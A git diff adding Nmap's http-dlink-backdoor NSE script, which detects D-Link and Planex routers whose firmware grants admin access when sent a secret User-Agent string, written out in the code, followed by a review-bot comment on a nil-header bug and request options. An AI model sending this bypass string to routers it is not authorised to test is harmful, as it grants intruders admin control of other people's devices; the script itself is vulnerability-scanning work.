diff --git a/CHANGELOG b/CHANGELOG index b66692681..2a8541d47 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,5 +1,8 @@ # Nmap Changelog ($Id$); -*-text-*- +o [NSE] Add http-dlink-backdoor script that detects DLink routers with firmware + backdoor allowing admin access over HTTP interface. [Patrik Karlsson] + o The ICMP ID of ICMP probes is now matched against the sent ICMP ID, to reduce the chance of false matches. Patch by Chris Johnson. diff --git a/scripts/http-dlink-backdoor.nse b/scripts/http-dlink-backdoor.nse new file mode 100644 index 000000000..2f8ce2650 --- /dev/null +++ b/scripts/http-dlink-backdoor.nse 
@@ -0,0 +1,71 @@
+description = [[
+Detects a firmware backdoor on some D-Link routers by changing the User-Agent
+to a "secret" value. Using the "secret" User-Agent bypasses authentication
+and allows admin access to the router.
+
+The following router models are likely to be vulnerable: DIR-100, DIR-120,
+DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240
+
+In addition, several Planex routers also appear to use the same firmware:
+BRL-04UR, BRL-04CW
+
+Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
+]]
+
+---
+-- @usage
+-- nmap -sV --script http-dlink-backdoor
+--
+-- @output
+-- PORT STATE SERVICE REASON
+-- 80/tcp open http syn-ack
+-- | http-dlink-backdoor:
+-- | VULNERABLE:
+-- | Firmware backdoor in some models of D-Link routers allow for admin password bypass
+-- | State: VULNERABLE
+-- | Risk factor: High
+-- | Description:
+-- | D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
+-- |
+-- | References:
+-- |_ http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
+---
+
+author = "Patrik Karlsson "
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln"}
+
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local vulns = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local response = http.get(host, port, "/", { redirect_ok = false, no_cache = true })
+ local server = response.header and response.header['server']
+ local vuln_table = {
+ title = "Firmware backdoor in some models of D-Link routers allow for admin password bypass",
+ state = vulns.STATE.NOT_VULN,
+ risk_factor = "High",
+ description = [[
+D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
+]],
+ references = {
+ 'http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/',
+ }
+ }
+ if ( response.status == 401 and server:match("^thttpd%-alphanetworks") ) or
+ ( response.status == 302 and server:match("^Alpha_webserv") ) then
+ response = http.get(host, port, "/", { header = { ["User-Agent"] = "xmlset_roodkcableoj28840ybtide" } })
+
+ if ( response.status == 200 ) then
+ vuln_table.state = vulns.STATE.VULN
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ return report:make_output(vuln_table)
+ end
+ end
+ return
+end
diff --git a/scripts/script.db b/scripts/script.db
index 7fae7b4da..aa65a873e 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -149,6 +149,7 @@ Entry { filename = "http-csrf.nse", categories = { "exploit", "intrusive", "vuln
 Entry { filename = "http-date.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-default-accounts.nse", categories = { "auth", "discovery", "safe", } }
 Entry { filename = "http-devframework.nse", categories = { "discovery", "intrusive", } }
+Entry { filename = "http-dlink-backdoor.nse", categories = { "exploit", "vuln", } }
 Entry { filename = "http-dombased-xss.nse", categories = { "exploit", "intrusive", "vuln", } }
 Entry { filename = "http-domino-enum-passwords.nse", categories = { "auth", "intrusive", } }
 Entry { filename = "http-drupal-enum-users.nse", categories = { "discovery", "intrusive", } }
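Review bot: The `server:match(...)` calls in the `if` condition of `action` dereference a value that can be nil: `server` is nil whenever the first response carries no `Server` header (or `response.header` is itself absent on a failed request), so a 401 or 302 from such a host raises "attempt to index a nil value" and aborts the script instead of returning quietly. Guard it at the assignment, `local server = (response.header and response.header['server']) or ""`, so the pattern matches simply fail. Separately, the second `http.get` drops the `redirect_ok = false` and `no_cache = true` options that the first request passes, so if the library follows the 302 or serves `/` from its response cache the `response.status == 200` check could report VULN without the request header having had any effect — confirm the http library's defaults and pass the same option table on both calls. `stdnse` is required but never referenced and can be removed.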